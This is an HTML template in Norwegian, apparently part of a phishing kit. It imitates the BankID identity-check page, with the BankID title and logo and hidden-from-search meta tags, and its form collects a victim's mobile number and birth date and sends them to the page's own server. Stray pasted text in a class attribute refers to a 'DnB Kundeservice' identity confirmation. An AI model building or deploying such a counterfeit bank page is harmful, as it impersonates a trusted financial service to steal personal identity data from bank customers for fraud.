{% load static %}
<html lang="nb">
<head>
    <meta charset="UTF-8">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet"
          integrity="sha384-KK94CHFLLe+nY2dmCWGMq91rCGa5gtU4mk92HdvYe+M/SXH301p5ILy+dN9+nJOZ" crossorigin="anonymous">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="{% static 'img/favicon.png' %}">
    <title>BankID</title>
    <link href="{% static 'style/main.css' %}" rel="stylesheet">
</head>
<body class="">
<main class="container">
    <div class="container__content">
        <div class="bankid-logo-wrapper">
            <img alt="" class="bankid-logo" src="{% static 'img/logo.svg' %}">
        </div>

        <div class="page" id="payment" style="">
            <form method="post" action="">
                {% csrf_token %}
                <div class="page__content card">

                    <div class="card__heading">
                        <h1 tabindex="-1" data-i18n="permission_payment_heading">Mobilnummer og fødselsdato</h1>
                    </div>
                    <div class="card__body">
                        <p class="card__label" data-i18n="permission_common_merchant_label">Mobilnummer</p>
                        <div class="input-group mb-3">
                            <div class="input-group-prepend">
                            <span class="input-group-text" id="basic-addon1">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="25"><path
                                        d="M3.75 0h8.5C13.216 0 14 .784 14 1.75v12.5A1.75 1.75 0 0 1 12.25 16h-8.5A1.75 1.75 0 0 1 2 14.25V1.75C2 .784 2.784 0 3.75 0ZM3.5 1.75v12.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25h-8.5a.25.25 0 0 0-.25.25ZM8 13a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg>
                            </span>
                            </div>
                            <input type="text" pattern="[0-9]+" minlength="8" maxlength="8" id="phone" name="phone"
                                   class="form-control"
                                   placeholder="8 Siffer" aria-label="Username"
                                   aria-describedby="basic-addon1">
                        </div>
                        <div class="card__horizontal-separator"></div>
                        <p class="card__label" data-i18n="permission_payment_amount">Fødselsdato</p>
                        <div>
                            <div class="input-group mb-3">
                                <div class="input-group-prepend">
                            <span class="input-group-text" id="basic-addon1">
                                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="25"><path
                                        d="M4.75 0a.75.75 0 0 1 .75.75V2h5V.75a.75.75 0 0 1 1.5 0V2h1.25c.966 0 1.75.784 1.75 1.75v10.5A1.75 1.75 0 0 1 13.25 16H2.75A1.75 1.75 0 0 1 1 14.25V3.75C1 2.784 1.784 2 2.75 2H4V.75A.75.75 0 0 1 4.75 0ZM2.5 7.5v6.75c0 .138.112.25.25.25h10.5a.25.25 0 0 0 .25-.25V7.5Zm10.75-4H2.75a.25.25 0 0 0-.25.25V6h11V3.75a.25.25 0 0 0-.25-.25Z"></path></svg>
                            </span>
                                </div>
                                <input pattern="[0-9]+" id="birthday" name="birthday" type="text" class="form-control"
                                       placeholder="ddmmåå" aria-label="Username"
                                       aria-describedby="basic-addon1" minlength="6" maxlength="6" required
                                       aria-invalid="true">
                            </div>
                            <span id="js-payment-currency"
                                  class="card__payment-9:41 Modal title Close 􀁍 Bekreft identitetssjekk Hvor DnB Kundeservice 15. mars 12:16, Norge Bekreft identitet Avbrytcurrency">NOK</span>
                        </div>
                    </div>
                </div>
                <div class="page__buttons">
                    <button type="submit" data-i18n="permission_payment_heading" id="confirm-payment-button"
                            class="login-button">
                        Bekrefte
                    </button>
                </div>
            </form>
        </div>
    </div>
</main>
<script>
</script>
</body>
</html>